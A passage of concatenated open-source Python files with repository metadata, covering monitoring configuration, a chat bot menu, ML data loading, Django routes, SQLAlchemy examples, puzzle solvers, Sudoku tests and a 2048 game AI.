It's mainly for configuration\n# part\nclass ServicesExtInfo(Items):\n name_property = \"host_name\" # use for the search by name\n inner_class = ServiceExtInfo # use for know what is in items\n\n # Merge extended host information into host\n def merge(self, services):\n for ei in self:\n if hasattr(ei, 'register') and not getattr(ei, 'register'):\n # We don't have to merge template\n continue\n hosts_names = ei.get_name().split(\",\")\n for host_name in hosts_names:\n s = services.find_srv_by_name_and_hostname(host_name, ei.service_description)\n if s is not None:\n # FUUUUUUUUUUsion\n self.merge_extinfo(s, ei)\n\n def merge_extinfo(self, service, extinfo):\n properties = ['notes', 'notes_url', 'icon_image', 'icon_image_alt']\n # service properties have precedence over serviceextinfo properties\n for p in properties:\n if getattr(service, p) == '' and getattr(extinfo, p) != '':\n setattr(service, p, getattr(extinfo, p))\n","repo_name":"shinken-solutions/shinken","sub_path":"shinken/objects/serviceextinfo.py","file_name":"serviceextinfo.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","stars":1133,"dataset":"github-code","pt":"39"} +{"seq_id":"7697137246","text":"# -*- coding:utf-8 -*-\n\nfrom observers.menus import Menus\n\nimport config as CONFIG\n\nclass Rule(Menus):\n def __init__(self, function_) -> None:\n return function_(CONFIG.rule_word, self)\n def handle(self, data, users):\n result = ''\n openid = data['UserName']\n content = data['Content']\n id_ = users.get(openid, -1)\n\n # rule lookup\n if id_ == 0:\n result += CONFIG.rule_text\n users[openid] = 2\n\n # confirm the lookup and show the rule menu\n elif id_ == 2:\n # '1' or '是的' (\"yes\") both count as confirmation\n if content != '1' and content != '是的':\n return CONFIG.find_text\n result += CONFIG.select_text\n for i, _ in enumerate(CONFIG.rule_text_map):\n result += '\\t{}:【{}】\\n'.format(i+1, _)\n users[openid] = 20\n \n # show the detailed rule for the index the user typed\n elif id_ == 20:\n if content in [str(i) for i in range(len(CONFIG.rule_index_map))]:\n result += CONFIG.rule_index_map.get(int(content), '')\n elif content in CONFIG.rule_text_map:\n result += CONFIG.rule_text_map.get(content, '')\n else:\n return CONFIG.find_text\n \n result += '{}:【{}】'.format(0, '返回')\n return result\n","repo_name":"dTIris/wechat_robot","sub_path":"observers/rule.py","file_name":"rule.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"44400444194","text":"#!/usr/bin/python3\n\nclass misMatchFlagError(Exception):\n \"\"\"Raised when flag did not match\"\"\"\n pass\n\n\ndef shutOff():\n import dbus\n sys_bus = dbus.SystemBus()\n lg = sys_bus.get_object('org.freedesktop.login1','/org/freedesktop/login1')\n pwr_mgmt = dbus.Interface(lg,'org.freedesktop.login1.Manager')\n shutdown_method = pwr_mgmt.get_dbus_method(\"PowerOff\")\n shutdown_method(True)\n\n\ndef power_flag(flag):\n \"\"\"Set Your Flag loose, follow, strict\"\"\"\n try:\n if flag == 'loose':\n return 30\n elif flag == 'follow':\n return 15\n elif flag == 'strict':\n return 10\n else :\n raise misMatchFlagError\n except misMatchFlagError as me:\n return \"Flag Did not match give any one from this 'loose' or 'follow' or 'strict'\"\n\n\ndef activity(*args,**kwargs):\n s= args\n return list(set([x for x in s[0] if s[0].count(x) > 
s[1]-1]))\n\n\n","repo_name":"ShivaGuntuku/Monitor-System-Activity","sub_path":"power_off.py","file_name":"power_off.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"4353205839","text":"from imports import *\n\ndef amd_dataloader(train_ds,val_ds,bs_train = 16,bs_val = 16):\n\n split = ShuffleSplit(n_splits=1,test_size=0.2,random_state=10)\n ids = range(len(train_ds))\n for idx_train,idx_val in split.split(ids):\n print(len(idx_train),len(idx_val))\n\n train_ds = Subset(train_ds,idx_train)\n val_ds = Subset(val_ds,idx_val)\n \n train_dl = DataLoader(train_ds,batch_size=bs_train,shuffle=True)\n val_dl = DataLoader(val_ds,batch_size=bs_val,shuffle=True)\n\n return train_dl, val_dl\n\n\n\n","repo_name":"DEVx96/iChallenge-AMD","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"24160665760","text":"import os\nimport pickle\nimport pathlib\n\nimport torch\n\n\ndef to_list(tensor):\n return tensor.detach().cpu().tolist()\n\n\ndef to_tensor(vector):\n # Something is wrong with this and I have no idea what\n tensor = torch.tensor(vector, dtype=torch.float)\n return tensor\n # return torch.Tensor(vector, dtype=torch.float)\n\n\ndef torch_save(vector, filename, overwrite=False):\n if os.path.exists(filename) and not overwrite:\n print(f\"{filename} already exists! Please use overwrite flag.\")\n else:\n create_path(filename)\n torch.save(torch.tensor(vector, dtype=torch.float), filename)\n\n\ndef torch_load(filename, to_gpu=False):\n if os.path.exists(filename):\n if to_gpu:\n return torch.load(filename)\n return torch.load(filename, map_location=torch.device(\"cpu\"))\n else:\n print(f\"{filename} does not exist!\")\n\n\ndef pickle_save(vector, filename, overwrite=False):\n if os.path.exists(filename) and not overwrite:\n print(f\"{filename} already exists! Please use overwrite flag.\")\n else:\n create_path(filename)\n pickle.dump(vector, open(filename, \"wb\"))\n\n\ndef pickle_load(filename):\n if os.path.exists(filename):\n with open(filename, \"rb\") as f:\n return pickle.load(f)\n else:\n print(f\"{filename} does not exist!\")\n\n\ndef create_path(pathname: str) -> None:\n \"\"\"Creates the directory for the given path if it doesn't already exist.\"\"\"\n dir = str(pathlib.Path(pathname).parent)\n if not os.path.exists(dir):\n os.makedirs(dir)\n\n\ndef fewshot_filename(*paths) -> str:\n \"\"\"Given a path relative to this project's top-level directory, returns the\n full path in the OS.\n\n Args:\n paths: A list of folders/files. 
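(E.g., fewshot_filename(\"data\", \"model.pt\") resolves to \"<project root>/data/model.pt\".) 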
These will be joined in order with \"/\"\n            or \"\\\" depending on platform.\n\n    Returns:\n        The full absolute path in the OS.\n    \"\"\"\n    # First parent gets the scripts directory, and the second gets the top-level.\n    result_path = pathlib.Path(__file__).resolve().parent.parent\n    for path in paths:\n        result_path /= path\n    return str(result_path)\n","repo_name":"fastforwardlabs/few-shot-text-classification","sub_path":"fewshot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"19"}
+{"seq_id":"72745503084","text":"import json\nimport requests\n\n\ndef post(image_path,is_url,server_path):\n    headers = {\n        'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'\n    }\n    request_body = {'adress':image_path,'is_url':is_url}\n    body = json.dumps(request_body)\n    content = requests.post(server_path,body,headers=headers)\n    return content.json()\nif __name__ == '__main__':\n    print(post(image_path ='https://dss3.bdstatic.com/70cFv8Sh_Q1YnxGkpoWK1HF6hhy/it/u=1208538952,1443328523&fm=26&gp=0.jpg',\\\n        server_path='http://127.0.0.1:8888/model/array_cls',\\\n        is_url=True))\n\n","repo_name":"ZSharp7/YoloV3-TF","sub_path":"tornado_client.py","file_name":"tornado_client.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"74468629482","text":"languages = {\"html\",\"css\",\"js\",\"bootstrap\"}\n\n# counter = 1\n# for language in languages:\n#     print(str(counter) + \" : \" + language)\n#     counter += 1\ni = 1\njson = {\"name\": \"Coder Shiyar\", \"age\": 21, \"country\": \"Netherlands\"}\nfor data in json:\n    if data == \"age\":\n        break\n    print(str(i) + \" : \" + str(json[data]))\n    i += 1\nelse:\n    print(\"Finished displaying the data inside the for loop\")","repo_name":"codershiyar/python","sub_path":"LES23/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"}
+{"seq_id":"39980324421","text":"\"\"\"lms URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import:  from my_app import views\n    2. Add a URL to urlpatterns:  path('', views.home, name='home')\nClass-based views\n    1. Add an import:  from other_app.views import Home\n    2. Add a URL to urlpatterns:  path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. 
Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom homepage.views import *\nfrom curriculo.views import *\nfrom restrito.views import *\nfrom contas.views import *\n\nurlpatterns = [\n path('', index),\n #path('cursos//', curso),\n # path('/', disciplina), \n #path('/disciplinas/', listadisciplina),\n #path('nova_disciplina/', nova_disciplina),\n #path('novo_curso/', novo_curso),\n########################### CONTAS ##################################\n path('lista_curriculo/', lista_curriculo),\n path('cursos/', cursos_lista),\n path(\"cursos/incluir/\", incluirCurso),\n path(\"cursos/remover/\", removerCurso),\n path(\"cursos/alterar/\", alterarCurso),\n path('disciplina/', disciplina),\n path('disciplina/incluir/', incluirDisciplina),\n path(\"disciplina/alterar/\", alterarDisciplina),\n path(\"disciplina/remover/\", removerDisciplina),\n path(\"disciplina_ofertada/\", disciplinaOfertada_lista),\n path(\"disciplina_ofertada/incluir/\", incluirDisciplinaOfertada),\n path(\"disciplina_ofertada/alterar//\", alterarDisciplinaOfertada),\n path(\"disciplina_ofertada/remover//\", removerDisciplinaOfertada),\n########################### CURRICULO ###################################\n path('lista_contas/', lista_contas),\n path('contas/Aluno/', Aluno),\n path('contas/Aluno/incluir/', incluirAluno),\n path(\"Aluno/alterar/\", alterarAluno),\n path(\"Aluno/remover/\", removerAluno),\n path('contas/Professor/', Professor),\n path('contas/Professor/incluir/', incluirProfessor),\n path(\"Professor/alterar/\", alterarProfessor),\n path(\"Professor/remover/\", removerProfessor),\n path('contas/Coordenador/', Coordenador),\n path('contas/Coordenador/incluir/', incluirCoordenador),\n path(\"Coordenador/alterar/\", alterarCoordenador),\n path(\"Coordenador/remover/\", removerCoordenador),\n path('contas/Mensagem/', Mensagem),\n path('contas/Mensagem/incluir/', incluirMensagem),\n path(\"Mensagem/alterar/\", alterarMensagem),\n path(\"Mensagem/remover/\", removerMensagem),\n########################## RESTRITO #######################################\n path('lista_restrito/', lista_restrito),\n path('atividade/', Atividade),\n path(\"atividade/incluir/\", incluirAtividade),\n path(\"atividade/alterar/\", alterarAtividade),\n path(\"atividade/remover/\", removerAtividade),\n path('atividade_vinculada/', atividade_vinculada),\n path('atividade_vinculada/incluir/', incluiratividade_vinculada),\n path('atividade_vinculada/alterar/', alteraratividade_vinculada),\n path('atividade_vinculada/remover/', removeratividade_vinculada),\n path('entrega/', entrega_lista),\n path('entrega/incluir/', incluir_entrega),\n path('entrega/alterar/', alterar_entrega),\n path('entrega/remover/', remover_entrega),\n path('solicitacao_matricula/', solicitacao_matricula_lista),\n path('solicitacao_matricula/incluir/', incluir_solicitacao_matricula),\n path('solicitacao_matricula/alterar/', alterar_solicitacao_matricula),\n path('solicitacao_matricula/remover/', remover_solicitacao_matricula),\n path('admin/', admin.site.urls),\n path('login/',login),\n]\n","repo_name":"guilhermegdf/Sistema-de-faculdade---Django","sub_path":"docs/lms/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3986,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"24149354230","text":"\"\"\"\nGrid Challenge\nGiven a square grid of characters in the range ascii[a-z], \nrearrange elements of each row 
alphabetically, ascending. \nDetermine if the columns are also in ascending alphabetical order, \ntop to bottom. Return YES if they are or NO if they are not.\n\"\"\"\n\"\"\"\n1. Sort every row.\n2. Check whether each column is sorted in ascending order.\n\"\"\"\n\n\ndef gridChallenge(grid):\n    # create matrix\n    matrix = []\n    for i in range(len(grid)):\n        row = []\n\n        for j in range(len(grid[0])):\n            row.append(grid[i][j])\n\n        row.sort()\n        matrix.append(row)\n\n    # check whether each column is arranged in ascending order\n    for j in range(len(matrix[0])):\n        col = []\n\n        for i in range(len(matrix)):\n            col.append(matrix[i][j])\n\n        if col != sorted(col):\n            return \"NO\"\n\n    return \"YES\"\n","repo_name":"mrbartrns/algorithm-v2","sub_path":"hackerrank/preparation-kit/day4-1.py","file_name":"day4-1.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"19023532403","text":"import tensorflow as tf\n\na = tf.constant(5,name=\"inputa\")\nb = tf.constant(4,name = \"inputb\")\nc = tf.multiply(a,b,name =\"mul\")\nd = tf.add(a,b,name = \"add\")\ne = tf.add(c,d,name= \"final\")\n\nsess = tf.Session()\nsess.run(e)\nwriter = tf.summary.FileWriter('./graph',sess.graph)\nwriter.close()\nsess.close()\n","repo_name":"priyankanagaraj1494/ML_basic_codes","sub_path":"Graphs/sample2.py","file_name":"sample2.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"23994391399","text":"#!/usr/bin/env python3\n\nfrom datetime import datetime\n\nfrom sqlalchemy import (\n    create_engine,\n    desc,\n    func,\n    CheckConstraint,\n    PrimaryKeyConstraint,\n    UniqueConstraint,\n    Index,\n    Column,\n    DateTime,\n    Integer,\n    String,\n)\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\n\nBase = declarative_base()\n\n\nclass Student(Base):\n    __tablename__ = \"students\"\n    __table_args__ = (\n        PrimaryKeyConstraint(\"id\", name=\"id_pk\"),\n        UniqueConstraint(\"email\", name=\"unique_email\"),\n        CheckConstraint(\"grade BETWEEN 1 AND 12\", name=\"grade_between_1_and_12\"),\n    )\n\n    Index(\"index_name\", \"name\")\n\n    id = Column(Integer())\n    name = Column(String())\n    email = Column(String(55))\n    grade = Column(Integer())\n    birthday = Column(DateTime())\n    enrolled_date = Column(DateTime(), default=datetime.now())\n\n    # id = Column(Integer(), primary_key=True)\n    # name = Column(String())\n\n    def __repr__(self) -> str:\n        return f\"Student {self.id}: \" + f\"{self.name}, \" + f\"Grade {self.grade}\"\n\n\nif __name__ == \"__main__\":\n    engine = create_engine(\"sqlite:///:memory:\")\n    Base.metadata.create_all(engine)\n\n    # use our engine to configure a 'Session' class\n    Session = sessionmaker(bind=engine)\n    # use 'Session' class to create 'session' object\n    session = Session()\n\n    albert_einstein = Student(\n        name=\"Albert Einstein\",\n        email=\"albert.einstein@zurich.edu\",\n        grade=6,\n        birthday=datetime(year=1879, month=3, day=14),\n    )\n\n    alan_turing = Student(\n        name=\"Alan Turing\",\n        email=\"alan.turing@sherborne.edu\",\n        grade=11,\n        birthday=datetime(year=1912, month=6, day=23),\n    )\n\n    session.bulk_save_objects([albert_einstein, alan_turing])\n    session.commit()\n\n    # create session, student objects\n\n    students = session.query(Student).all()\n    print(students)\n\n    # we can specify this in the arguments we pass to query()\n    names = [name for name in session.query(Student.name)]\n    print(names)\n\n    # By default, results from any database 
query are ordered by their primary key.\n # The order_by() method allows us to sort by any column:\n students_by_name = [student for student in session.query(Student.name).order_by(Student.name)]\n print(students_by_name)\n\n # To sort results in descending order, we need to use the desc() function from the sqlalchemy module:\n students_by_grade_desc = [\n student for student in session.query(Student.name, Student.grade).order_by(desc(Student.grade))\n ]\n\n print(students_by_grade_desc)\n\n # To limit your result set to the first x records, you can use the limit() method:\n oldest_student = [\n student for student in session.query(Student.name, Student.birthday).order_by(desc(Student.grade)).limit(1)\n ]\n\n print(oldest_student)\n\n # The first() method\n oldest_student = session.query(Student.name, Student.birthday).order_by(desc(Student.grade)).first()\n\n print(oldest_student)\n\n # func from sqlalchemy gives us access to common SQL operations through functions like sum() and count()\n student_count = session.query(func.count(Student.id)).first()\n\n print(student_count)\n\n # Retrieving specific records requires use of the filter() method.\n query = session.query(Student).filter(Student.name.like(\"%Alan%\"), Student.grade == 11)\n\n for record in query:\n print(record.name)\n\n # use Python to modify objects directly and then commit those changes through the session.\n for student in session.query(Student):\n student.grade += 1\n\n session.commit()\n\n print([(student.name, student.grade) for student in session.query(Student)])\n\n # delete() method.\n query = session.query(Student).filter(Student.name == \"Albert Einstein\")\n\n # ------------ retrieve first matching record as object\n albert_einstein = query.first()\n\n # ------------ delete record\n session.delete(albert_einstein)\n session.commit()\n\n # ------------ try to retrieve deleted record\n albert_einstein = query.first()\n\n print(albert_einstein)\n\n # -------------you can call the delete() method from your query instead\n query = session.query(Student).filter(Student.name == \"Albert Einstein\")\n\n query.delete()\n\n albert_einstein = query.first()\n\n print(albert_einstein)\n","repo_name":"Cnnjuguna/python-p3-crud-with-sqlalchemy","sub_path":"lib/sqlalchemy_sandbox.py","file_name":"sqlalchemy_sandbox.py","file_ext":"py","file_size_in_byte":4366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"16787332717","text":"def count_disjoint(graph, endpoints):\n seen = set()\n count = 0\n for e in range(endpoints):\n if e not in seen:\n count += 1\n\n queue = [e]\n while queue:\n node = queue.pop(0)\n seen.add(node)\n neighbors = graph[node]\n queue.extend([n for n in neighbors if n not in seen])\n\n return count\n\n\ndef main():\n cities = int(input())\n for _ in range(cities):\n endpoints = int(input())\n graph = {i: set() for i in range(endpoints)}\n roads = int(input())\n for _ in range(roads):\n start, end = map(int, input().split())\n graph[start].add(end)\n graph[end].add(start)\n\n print(count_disjoint(graph, endpoints) - 1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"ecly/kattis","sub_path":"reachableroads/reachableroads.py","file_name":"reachableroads.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"20259549746","text":"import unittest\nfrom unittest.mock import patch\n\nfrom sudoku_UI import *\n\n\nclass Test(unittest.TestCase):\n def 
setUp(self):\n        self.sudoku = Sudoku()\n\n    @patch(\"builtins.input\", side_effect=[0, 0, 1])\n    @patch(\"builtins.print\")\n    def testCase_is_number_in_SubSquare_Exception(self, mock_print, mock_inputs):\n\n        play(self.sudoku)\n        mock_print.assert_called_with(\n            \"\\x1b[95mThe specified number is already in the square\\x1b[0m\\n\"\n        )\n\n    @patch(\"builtins.input\", side_effect=[1, 0, 8])\n    @patch(\"builtins.print\")\n    def testCase_is_number_in_Column_Exception(self, mock_print, mock_inputs):\n\n        play(self.sudoku)\n        mock_print.assert_called_with(\n            \"\\x1b[95mThe specified number is already in the column\\x1b[0m\\n\"\n        )\n\n    @patch(\"builtins.input\", side_effect=[1, 0, 4])\n    @patch(\"builtins.print\")\n    def testCase_is_number_in_Row_Exception(self, mock_print, mock_inputs):\n\n        play(self.sudoku)\n        mock_print.assert_called_with(\n            \"\\x1b[95mThe specified number is already in the row\\x1b[0m\\n\"\n        )\n\n    @patch(\"builtins.input\", side_effect=[1, 10, 1])\n    @patch(\"builtins.print\")\n    def testCase_check_column_Exception(self, mock_print, mock_inputs):\n\n        play(self.sudoku)\n        mock_print.assert_called_with(\n            \"\\x1b[95mWrong number of row / column. Try again.\\x1b[0m\\n\"\n        )\n\n    @patch(\"builtins.input\", side_effect=[10, 1, 1])\n    @patch(\"builtins.print\")\n    def testCase_check_row_Exception(self, mock_print, mock_inputs):\n\n        play(self.sudoku)\n        mock_print.assert_called_with(\n            \"\\x1b[95mWrong number of row / column. Try again.\\x1b[0m\\n\"\n        )\n\n    @patch(\"builtins.input\", side_effect=[1, 10, \"a\"])\n    @patch(\"builtins.print\")\n    def testCase_check_input_2(self, mock_print, mock_inputs):\n\n        play(self.sudoku)\n        mock_print.assert_called_with(\n            \"\\x1b[95m Wrong input. Try again.\\x1b[0m\\n\")\n\n    @patch(\"builtins.input\", side_effect=[10, 1, 0])\n    @patch(\"builtins.print\")\n    def testCase_check_square_Exception(self, mock_print, mock_inputs):\n\n        with self.assertRaises(InvalidSquareException):\n            self.sudoku.check_square(number=1, row=1, column=1)\n\n    @patch(\"builtins.input\", side_effect=[1, 0, 2])\n    @patch(\"builtins.print\")\n    def testCase_check_square(self, mock_print, mock_inputs):\n\n        play(self.sudoku)\n        mock_print.assert_called_with(\"\\x1b[92mWell Done\\x1b[0m\")\n\n    @patch(\"builtins.input\", side_effect=[8, 8, 6])\n    @patch(\"builtins.print\")\n    def testCase_user_has_won(self, mock_print, mock_input):\n\n        self.sudoku.board = [\n            [1, 8, 9, 5, 4, 7, 6, 2, 3],\n            [2, 3, 7, 8, 6, 1, 5, 9, 4],\n            [4, 5, 6, 9, 3, 2, 7, 1, 8],\n            [3, 2, 1, 6, 9, 4, 8, 5, 7],\n            [5, 6, 4, 1, 7, 8, 9, 3, 2],\n            [9, 7, 8, 3, 2, 5, 4, 6, 1],\n            [6, 1, 3, 4, 8, 9, 2, 7, 5],\n            [7, 4, 5, 2, 1, 6, 3, 8, 9],\n            [8, 9, 2, 7, 5, 3, 1, 4, 0],\n        ]\n        play(self.sudoku)\n        mock_print.assert_called_with(\"\\x1b[92mYou WON \\x1b[0m\\n\")\n\n    def test_board(self):\n        board = (\n            \"+-------+-------+-------+\\n\"\n            \"| 1 | 5 | 3 |\\n\"\n            \"| 3 7 | 1 | 4 |\\n\"\n            \"| | 2 | |\\n\"\n            \"+-------+-------+-------+\\n\"\n            \"| | 9 4 | |\\n\"\n            \"| 4 | | 3 2 |\\n\"\n            \"| | 3 2 5 | |\\n\"\n            \"+-------+-------+-------+\\n\"\n            \"| | | 2 |\\n\"\n            \"| 7 4 | | |\\n\"\n            \"| 8 | 3 | 1 |\\n\"\n            \"+-------+-------+-------+\\n\"\n        )\n        self.assertEqual(board, self.sudoku.__str__())\n\n\nif __name__ == \"__main__\":  # pragma: no cover\n    unittest.main()\n","repo_name":"MatiasBoldrini/Sudoku","sub_path":"test_sudoku.py","file_name":"test_sudoku.py","file_ext":"py","file_size_in_byte":3882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"10160003851","text":"import sys\n\n# Max hop 
distance\nX = 3\n\nstonesCost = [0, 20, 30, 40, 25, 15, 20, 28]\ntotalCost = 0\n\n'''\nI want to look at one-ahead, two-ahead, and three-ahead and choose the minimum of these three.\n'''\ni = 0\ncurrStone = 0\ncostMin = 9999\ncostMindex = 0\noptions = [0] * X\nwhile i < len(stonesCost) - 1:\n if (len(stonesCost) - i) <= X:\n options = [0] * (len(stonesCost) - i - 1)\n valTest = len(stonesCost) - i\n for x in range(0, len(stonesCost) - i - 1):\n options[x] = stonesCost[i + x + 1]\n else:\n for x in range(0, X):\n options[x] = stonesCost[i + x + 1]\n localMax = 9999\n for x in range(0, len(options)):\n if options[x] < localMax:\n localMax = options[x]\n costMindex = i + x + 1\n i = costMindex\n currStone = localMax\n totalCost = totalCost + localMax\n\nprint(totalCost)\n\n\ndef min_cost_dp(C, X):\n N = len(C)\n dp = [sys.maxsize for _ in range(0, N)]\n dp[0] = 0\n for k in range(0, N):\n for j in range(1, min(X, k) + 1):\n dp[k] = min(dp[k], dp[k - j] + C[k])\n return dp[N - 1]\n\n\nprint(min_cost_dp(stonesCost, X))\n","repo_name":"hippi345/algorithms","sub_path":"python/dynamic_programming/hoppingStonesCost.py","file_name":"hoppingStonesCost.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37714015653","text":"from random import randint\nfrom BaseAI import BaseAI\nimport time\nimport random \nimport math\n'''\nNeil Kumar (nk2739)\nAI Homework 2\n3/20/18\n'''\n\nclass PlayerAI(BaseAI):\n\n\t'''\n\tReturns the optimal move for the maximizing agent.\n\t'''\n\tdef getMove(self, grid):\n\n\t\tmoves = grid.getAvailableMoves()\n\t\toptimalMove = -1\n\n\t\t# Allots each move a fraction of the total move time \n\t\ttimeLimit = 0.2 / float(len(moves))\n\t\toptimalMoveVal = -1*float(\"inf\")\n\n\t\t# Goes through the available moves and runs minimax on each\n\t\tfor move in moves:\n\n\t\t\tgridCopy = grid.clone()\n\t\t\tgridCopy.move(move)\n\n\t\t\t# Makes sure each move runs within a specific time limit \n\t\t\tinitTime = time.clock()\n\t\t\tcurTime = initTime\n\t\t\talpha = -1*float(\"inf\")\n\t\t\tbeta = float(\"inf\")\n\t\t\tdepth_limit = 3\n\n\t\t\t(state,score) = self.maximize(gridCopy,alpha,beta,depth_limit,initTime,curTime,timeLimit)\n\n\t\t\t# Selects the max-scored move amongst all moves \n\t\t\tif score > optimalMoveVal:\n\t\t\t\toptimalMoveVal = score\n\t\t\t\toptimalMove = move\n\n\t\treturn optimalMove\n\n\t'''\n\tEvaluates a board based on a number of heuristics \n\t'''\n\tdef evaluateGrid(self,grid):\n\t\tnumAvailableCells = len(grid.getAvailableCells()) \n\t\tsmoothness = self.calcSmoothness(grid) \n\t\tmonotonicity = self.calcMonotonicity(grid) \n\t\ttotalGridValue = self.getGridTotalValue(grid)\n\t\tmaxTileValue = grid.getMaxTile()\n\t\tdistanceToMaxValue = self.getDistanceToMax(grid)\n\t\taverageTileValue = self.getGridAverageTileValue(grid)\n\n\t\tnormSmoothness = float(math.log(smoothness)/math.log(2))\n\t\tnormNumAvailable = math.log(numAvailableCells)/math.log(2) if numAvailableCells != 0 else 0\n\t\t\n\t\tavailableCellWeight = 13.5\n\t\tmonotonicityWeight = 5\n\t\tsmoothnessWeight = 6\n\t\tmaxTileWeight = 1.5\n\t\tdistanceToMaxValueWeight = 25\n\t\taverageTileValueWeight = 0.00002\n\n\t\treturn (availableCellWeight*normNumAvailable + maxTileWeight*maxTileValue) \\\n\t\t- (monotonicityWeight*monotonicity + smoothnessWeight*normSmoothness + distanceToMaxValueWeight*distanceToMaxValue)\n\n\t'''\n\tThe 'Maximize' function used in Expectiminimax.\n\tUsed to maximize the 
player's score.\n\t'''\n\tdef maximize(self,grid,alpha,beta,depth,initTime,curTime,timeLimit):\n\t\t\n\t\tmoves = grid.getAvailableMoves()\n\t\tmaxChild = None\n\t\tmaxUtil = -1*float('inf')\n\n\t\t# Terminal Test - done when no more moves, depth limit reached, or time is up\n\t\tif (len(moves) == 0 or depth == 0 or time.clock() - initTime >= timeLimit):\n\t\t\treturn (maxChild, self.evaluateGrid(grid))\n\n\t\t# Runs through each \"child\" or state where the next move is played\n\t\tfor move in moves:\n\t\t\tgridCopy = grid.clone()\n\t\t\tgridCopy.move(move)\n\n\t\t\t# Runs minimize from maximize\n\t\t\tnewTime = time.clock()\n\t\t\t(newChild,newUtil) = self.minimize(gridCopy,alpha,beta,depth,initTime,newTime,timeLimit)\n\n\t\t\tif newUtil > maxUtil:\n\t\t\t\tmaxChild = gridCopy\n\t\t\t\tmaxUtil = newUtil\n\n\t\t\t# Prunes if necessary \n\t\t\tif maxUtil >= beta:\n\t\t\t\tbreak\n\n\t\t\tif maxUtil > alpha:\n\t\t\t\talpha = maxUtil\n\n\t\treturn (maxChild,maxUtil)\n\n\t'''\n\tThe 'Minimize' function used in Expectiminimax. \n\tUsed to minimize the player's score. \n\t'''\n\tdef minimize(self,grid,alpha,beta,depth,initTime,curTime,timeLimit):\n\t\t\n\t\topenCells = grid.getAvailableCells()\n\t\tminChild = None\n\t\tminUtil = float('inf')\n\n\t\t# Terminal Test - done when no free tiles, depth limit is reached, or time is up \n\t\tif (len(openCells) == 0 or depth == 0 or time.clock() - initTime >= timeLimit):\n\t\t\treturn (minChild, self.evaluateGrid(grid))\n\n\t\t# Goes through each \"child\" or way to place a 2 or 4 tile\n\t\tfor cell in openCells:\n\t\t\n\t\t\t# Gets a probability in the range [0,1)\n\t\t\tp = random.random() \n\n\t\t\t# Chooses a tile to insert \n\t\t\ttoInsert = 4 if p >= 0.9 else 2 \n\n\t\t\tgridCopy = grid.clone()\n\t\t\tgridCopy.insertTile(cell,toInsert)\n\n\t\t\t# Runs maximize\n\t\t\tnewTime = time.clock()\n\t\t\t(newChild,newUtil) = self.maximize(gridCopy,alpha,beta,depth-1,initTime,newTime,timeLimit)\n\n\t\t\tif newUtil < minUtil:\n\t\t\t\tminChild = gridCopy\n\t\t\t\tminUtil = newUtil\n\n\t\t\t# Prunes if necessary \n\t\t\tif minUtil <= alpha:\n\t\t\t\tbreak\n\n\t\t\tif minUtil < beta:\n\t\t\t\tbeta = minUtil\n\n\t\treturn (minChild,minUtil)\n\n\t'''\n\tReturns the distance from the max element to the nearest corner.\n\tAims to keep the max element near the corners.\n\t'''\n\tdef getDistanceToMax(self,grid):\n\t\tmaxTileValue = grid.getMaxTile()\n\t\tminDistance = float(\"inf\")\n\n\t\tcorners = [(0,0),(0,grid.size-1),(grid.size-1,0),(grid.size-1,grid.size-1)]\n\n\t\tfor x in xrange(grid.size):\n\t\t\tfor y in xrange(grid.size):\n\n\t\t\t\tif (grid.map[x][y]==maxTileValue):\n\n\t\t\t\t\tfor corner in corners:\n\t\t\t\t\t\tdist = abs(corner[0]-x) + abs(corner[1]-y)\n\n\t\t\t\t\t\t# Returns the smallest distance to the nearest corner\n\t\t\t\t\t\tif dist < minDistance:\n\t\t\t\t\t\t\tminDistance = dist\n\n\t\t# Returns the distance of the max tile to the nearest corner \n\t\treturn minDistance\n\n\t'''\n\tCalculates the 'Monotonicity' of the grid or the number of times values\n\tchange between neighbors regarding growth in size. 
